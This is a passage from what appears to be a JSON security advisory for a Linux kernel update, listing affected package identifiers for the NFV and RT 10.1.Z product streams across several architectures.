"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
